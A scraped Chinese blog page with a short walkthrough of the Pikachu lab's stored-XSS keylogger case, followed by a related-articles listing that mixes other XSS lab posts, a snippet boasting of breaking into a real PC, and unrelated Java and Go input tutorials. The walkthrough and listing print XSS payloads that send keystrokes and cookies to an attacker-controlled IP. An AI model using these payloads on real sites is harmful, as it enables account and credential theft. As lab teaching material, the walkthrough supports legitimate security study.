pikachu--XSS（案例三：获取键盘记录）

案例三：Xss获取键盘记录

先简单介绍一下跨域

跨域：http:// www . gxy.com :8080 / script/test.js

协议子域名主域名端口资源地址

当协议、主机、端口的任意一个不相同时，称不同域

将不同域之间的请求数据操作，称跨域操作

下面这些标签可以跨域加载资源

<img src=”…”>//图片

把js 文件放到被攻击者的页面当中，通过获取键盘值，post发送给攻击者后台

利用：

存储型xss 留言板输入

<script src=" http://192.168.27.156 /pkxss/xkeypress/rk.php"> </script>

在键盘上随便输入发现会跳出来页面请求失败

在pkxss后台我们就可以看到获取的信息

原文地址：https://www.cnblogs.com/7-58/p/12324058.html

时间： 2024-10-02 07:43:26

pikachu--XSS（案例三：获取键盘记录）的相关文章

pikachu练习平台（XSS-漏洞测试案例（cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录））

XSS-漏洞测试案例 xss案例 1.cookie的窃取和利用 2.钓鱼攻击 3.XSS获取键盘记录在进行案例之前首先要搭建xss后台搭建xss后台 1.在pikachu文件夹下面,把pkxss单独放在www下面: 2.修改配置文件数据库服务器地址,账号,密码: 3.登录: 4.安装: 5.修改,重定向到一个可信的网站(令点击者不知情): 后台登陆成功: 一. get型xss cookie值获取首先修改字符输入长度: 输入框输入 <script>document.location='

Pikachu-xss漏洞之cookie获取、钓鱼攻击和xss获取键盘记录

将进行下图3个实验,更好的来理解xss的危害和原理先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将 Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可. 登入下默认没任何数据 1.1 GET型XSS利用:cookie获取先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没任何数据的在输入框中输入下

Java中获取键盘输入值的三种方法

Java中获取键盘输入值的三种方法 Java程序开发过程中,需要从键盘获取输入值是常有的事,但Java它偏偏就没有像c语言给我们提供的scanf(),C++给我们提供的cin()获取键盘输入值的现成函数!Java没有提供这样的函数也不代表遇到这种情况我们就束手无策,请你看以下三种解决方法吧: 以下将列出几种方法: 方法一:从控制台接收一个字符,然后将其打印出来 import java.io.*; public static void main(String [] args) throws

Java中获取键盘输入值的三种方法（转）

程序开发过程中,需要从键盘获取输入值是常有的事,但Java它偏偏就没有像c语言给我们提供的scanf(),C++给我们提供的cin()获取键盘输入值的现成函数!Java没有提供这样的函数也不代表遇到这种情况我们就束手无策,请你看以下三种解决方法吧: 以下将列出几种方法: 方法一:从控制台接收一个字符,然后将其打印出来 public static void main(String [] args) throws IOException{ System.out.print(“Enter a Char

java小知识点（一）---Java中获取键盘输入值的三种方法

Java中获取键盘输入值的三种方法程序开发过程中,需要从键盘获取输入值是常有的事,但Java它偏偏就没有像c语言给我们提供的scanf(),C++给我们提供的cin()获取键盘输入值的现成函数!Java没有提供这样的函数也不代表遇到这种情况我们就束手无策,请你看以下三种解决方法吧: 以下将列出几种方法: 方法一:从控制台接收一个字符,然后将其打印出来 publicstatic void main(String [] args) throws IOException{ Sys

Java中获取键盘输入值的三种方法【转】

pikachu XSS后台的使用和安装

xss后台的安装重定向到另一个可信网址让点击者不知情 1.cookie值获取查看源代码在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script> 点提交,会跳转到首页, http://192.168.50.100/pikachu/vul/xss/xss_r

因为空间日志不能发表那么就发表到博客里来吧.实战渗透拿湖南IP 个人计算机宽带电脑...呵呵空间有截图这上面就不发了..当然下面是有键盘记录的你们自己看记录自己破解吧福利还请各位多多关注我的博客@

前言:为了测试更好的六道轮回病毒....当然寒龙哥我直接搞肉鸡了....呵呵话虽如此.也会给大家发一些福利的..额对了下面呢?有很多值得的信息比如说花生壳域名等等.... 呵呵大家自己看看键盘记录吧..貌似还有新浪微博了.......算了今天的例程入侵思路简单渗透xp+提权系统权限——传马-+传毒+K杀毒.....废话不多说大家自己搞搞吧...呵呵哦公布一下一个xp的0day挂马漏洞! html挂马代码 ...供给大家学习利用!!!!!利用windows 进行执行

Go 获取键盘输入,进制转换

#### Go 获取键盘输入,进制转换最近爱上<<珂矣的心灵独语>> 连续听一下礼拜也不觉得厌: 喜欢她的宁静与安然,喜欢她的坦荡与欢喜,喜欢她的禅意与智慧; ***撑着一苇江湖,耕烟处, 入时无***##### 获取键盘输入 func Scanln(a ...interface{})(n int,err error) 在换行时停止扫描,也就是说通过换行来获得输入结束信号 func Scanf(format string, a ...interface{}) (n int,err